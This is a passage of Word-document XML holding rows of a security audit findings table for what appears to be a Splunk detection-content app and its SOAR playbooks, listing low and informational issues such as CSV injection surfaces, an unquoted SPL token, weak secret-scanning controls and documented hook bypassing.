            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Detection content</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Lookup CSV cells beginning with formula characters (export-boundary CSV injection surface only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk app and dashboards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Logic defect: missing leading pipe in remove_valid_domains subsearch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk app and dashboards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Over-broad placeholder filter macros (search *) and permissive shipped allow-lists</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk app and dashboards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Lookup WILDCARD match_type references a column absent from the CSV (suspicious_ports_list)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk app and dashboards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Stale and unattributed threat-intelligence lookups (SSLBL, dynamic DNS providers)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk app and dashboards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-09</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Example identity lookups shipped as defaults (domain_controllers, domain_admins)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk app and dashboards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Response templates: unquoted $src_user$ SPL token and instance-specific asset IDs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk app and dashboards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>DEP-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>contentctl-ng has no licence metadata, placeholder description and a non-public source repository</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Dependencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SEC-08</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Secret-prevention controls are weak: no scanner in CI, inert pre-commit hook, incomplete .gitignore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>PB1-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>phantom.debug logs full observable and result structures (investigation data to logs)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>1.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>SOAR playbooks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Lookup CSV header hygiene: UTF-8 BOM and leading-space field names</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk app and dashboards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>JSON schemas leave SPL/playbook/cron fields unconstrained; RemovedContent schema lacks additionalProperties:false</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk app and dashboards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>APP-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Documentation instructs bypassing pre-commit hooks (git commit --no-verify); yamllint scoped to detections only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1373" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Splunk app and dashboards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>CF-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Deprecated naive-UTC datetime APIs and epoch truncation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1147" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F6FA"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
